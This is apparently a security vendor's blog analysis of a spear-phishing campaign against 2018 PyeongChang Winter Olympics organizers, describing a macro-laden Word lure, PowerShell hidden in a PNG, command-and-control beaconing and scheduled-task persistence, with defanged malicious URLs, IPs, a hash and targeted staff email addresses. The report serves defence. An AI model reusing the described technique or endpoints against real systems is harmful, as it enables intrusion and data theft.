Winter Olympics Organizers targeted in latest Spear Phishing Spam Campaign using Power Shell Malware

logo

During our research, we came across a spear phishing campaign targeting the organizers of 2018 Winter Olympics. The campaign employs various obfuscation techniques and steganography to deliver malicious payload. Some of the intended recipients that we believe were targeted are:
  • yj.kim@pyeongchang2018.com
  • ticketing@pyeongchang2018.com
  • yeongseong.choi@pyeongchang2018.com
  • sanghee.cho@pyeongchang2018.com
  • icehockey@pyeongchang2018.com
The email has spoofed sender to make it look like it was sent from info@nctc.go.kr (South Korea’s National Counter-Terrorism Center). But on inspecting the headers, we found that sender email is spoofed. The email was sent from a server with IP address as 43.249.39.152 (hostname ospf1-apac-sg.stickyadstv.com), located in Singapore. The email was sent on 28thDecember 2017. Based on open source reporting (https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/), a different version of campaign was also discovered on 22ndDecember.

logo

Malicious Document / Technical Analysis

The email contained a word file as attachment with name “농식품부, 평창동계올림픽대비축산악취방지대책관련기관회의개최.doc” (SHA256: 41ce9e7c8ec4a5f399247d26087a37ad13b4fc8fc9ee62a1d2211b743b2f403a).The file name translates to “Organized by Ministry of Agriculture and Forestry and held in Pyeongchang Winter Olympic Games”, kept for luring thevictim to check the document’s content.

logo

Once opened, the Word file urges the user to “Enable Content”so they can view the content.Once the user clicks the button, the document then proceeds to run the following obfuscated macro code:

logo

The above malicious document macroexecutes following PowerShell code:

logo

The code when executed, downloads a PNG file from hxxps://www.thlsystems.forfirst[.]cz/images/adv_s3.png.

logo

The image containsPowerShell code embedded inside a PNG file using a recently released (on December 20) open source tool – Invoke-PSImage(https://github.com/peewpw/Invoke-PSImage).By modifying the above code, we can get following obfuscated PowerShell code:

logo

The above script then beacons to the C&C server athxxps://www.thlsystems.forfirst[.]cz/components/com_tags/views/login/process.php, and evaluates the received response directly using PowerShell. The above code also downloads implants from hxxps://www.thlsystems.forfirst[.]cz/components/com_tags/views/access_log and hxxp://200.122.181[.]63/os. These 2 scripts are then scheduled to run daily as scheduled tasksnamedasWindowsMediaServiceCore and WindowsMediaServiceCoreInitat 3PM and 11AM, respectively.

logo

While investigating the IP (200.122.181[.]63) from one of the implants, resolved to domain mafra.go.kr.jeojang.ga.The domain jeojang.ga was registered using Freenom, a free anonymous domain provider. If we look closely at the subdomains, we notice that the subdomains were kept this way to resemble South Korean Ministry of Agriculture and Forestry’s website – mafra.go.kr.The malicious domain is not linked to the South Korean ministry’s domain in any way.

Conclusion:

The interesting thing to note is attackers using the recently released Invoke-PSImageopensource tool, which was released on December 20. This spear phishing email was sent on 28th December, which shows that attackers tested and deployed the tool within 7 days of its release. Previous examples of attackers misusing opensource security tools are related to Empire framework, Mimikatz, BeEF, Nishang post-exploitation framework, etc.

With Winter Olympics coming close, we expect that the actors will be targeting people using Olympics-themed spams.

Indicators of Compromise:

200.122.181.63 43.249.39.152 ospf1-apac-sg.stickyadstv.com 41ce9e7c8ec4a5f399247d26087a37ad13b4fc8fc9ee62a1d2211b743b2f403a thlsystems.forfirst.cz mafra.go.kr.jeojang.ga  



Prevent Cyber Attacks with advance intelligence